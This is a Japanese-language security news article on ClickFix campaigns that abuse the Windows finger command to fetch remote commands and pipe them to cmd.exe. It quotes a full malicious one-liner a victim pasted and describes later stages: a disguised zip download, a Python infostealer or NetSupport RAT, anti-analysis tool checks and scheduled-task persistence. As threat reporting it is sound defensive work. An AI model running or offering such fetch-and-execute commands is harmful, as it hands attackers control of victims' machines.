数十年前からある「finger」コマンドが復活しつつあり、脅威アクターがこのプロトコルを利用して、Windows デバイス上で実行するリモートコマンドを取得しています。
過去には、人々は Unix や Linux システム上で Finger プロトコルを介してローカルおよびリモートユーザーに関する情報を調べるために、finger コマンドを使用しており、その後このコマンドは Windows にも追加されました。現在もサポートはされていますが、数十年前の人気ぶりと比べると、今日ではほとんど使われていません。
finger コマンドを実行すると、ユーザーのログイン名、名前(/etc/passwd に設定されている場合)、ホームディレクトリ、電話番号、最終ログイン時刻、その他の詳細など、基本的な情報が返されます。
出典: BleepingComputer
最近では、Finger プロトコルを悪用し、デバイス上で実行するコマンドを取得する ClickFix 攻撃とみられる悪意あるキャンペーンが確認されています。
このような形で finger コマンドが悪用されるのは今回が初めてではありません。研究者らは 2020 年に警告しており、このコマンドがマルウェアのダウンロードや検知回避に使われる LOLBIN(Living-off-the-Land Binary)として悪用されていたことが分かっています。
finger コマンドの悪用
先月、サイバーセキュリティ研究者の MalwareHunterTeam は BleepingComputer にバッチファイル [VirusTotal] を共有しました。このバッチファイルを実行すると、「finger [email protected][.]com」コマンドを使用してリモートの finger サーバーからコマンドを取得し、その出力を cmd.exe にパイプしてローカルで実行します。
出典: BleepingComputer
そのホストはすでにアクセス不能となっていますが、MalwareHunterTeam は finger コマンドを利用する追加のマルウェアサンプルや攻撃を発見しました。
たとえば、Reddit 上のあるユーザーは、Captcha を装った ClickFix 攻撃の被害に遭ったと警告しており、人間であることを確認するために Windows コマンドを実行するよう促されたと述べています。
「人間であることを確認する win + r に引っかかってしまいました。どうすればいいですか?」と、そのReddit 投稿には書かれています。
「急いでいて引っかかってしまい、cmd プロンプトに次の内容を入力してしまいました。」
「cmd /c start “” /min cmd /c “finger [email protected][.]org | cmd” && echo’ Verify you are human–press ENTER'”
このホストはすでに finger リクエストに応答していませんが、別の Reddit ユーザーがその出力を記録していました。
この攻撃は、finger [email protected][.]org を実行し、その出力を Windows コマンドプロセッサである cmd.exe にパイプすることで、Finger プロトコルをリモートスクリプト配信手段として悪用しています。
これにより取得されたコマンドが実行され、ランダムな名前のパスを作成し、curl.exe をランダムなファイル名にコピーし、名前を変えた curl 実行ファイルを使って cloudmega[.]org から PDF に偽装された zip アーカイブ [VirusTotal] をダウンロードして展開し、Python マルウェアパッケージを抽出します。
出典: BleepingComputer
その後、Python プログラムは pythonw.exe __init__.py を使って実行されます。
最後に実行されるコマンドは、攻撃者のサーバーにコールバックして実行を確認するものであり、その一方でユーザーには偽の「Verify you are human(あなたが人間であることを確認)」プロンプトが表示されます。
この Python パッケージの目的は明らかではありませんが、関連するバッチファイルから、インフォスティーラーであることが示唆されています。
MalwareHunterTeam はまた、「finger [email protected] | cmd」を使用して、前述の ClickFix 攻撃とほぼ同一のコマンドを取得・実行する類似のキャンペーンも発見しました。
出典: BleepingComputer
BleepingComputer が確認したところ、この攻撃はさらに進化しており、コマンドはマルウェア解析で一般的に使用されるツールを探し、見つかった場合は終了するようになっていました。これらのツールには、filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler、Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg、ProcessHacker などが含まれます。
マルウェア解析ツールが見つからない場合、コマンドは PDF ファイルに偽装された zip アーカイブをダウンロードして展開します。ただし、偽の PDF から悪意ある Python パッケージを抽出する代わりに、NetSupport Manager RAT パッケージを抽出します。
出典: BleepingComputer
その後、コマンドはユーザーがログインした際にこのリモートアクセス型マルウェアが起動するよう、スケジュールされたタスクを構成します。
現在確認されている「finger」の悪用は、ClickFix 攻撃を行っている単一の脅威アクターによるものとみられますが、人々が引き続きこれらの攻撃に騙されていることから、こうしたキャンペーンの存在を認識しておくことが重要です。
ディフェンダーにとって finger コマンドの使用をブロックする最善の方法は、Finger プロトコルでデーモンに接続する際に使用される TCP ポート 79 への送信トラフィックをブロックすることです。
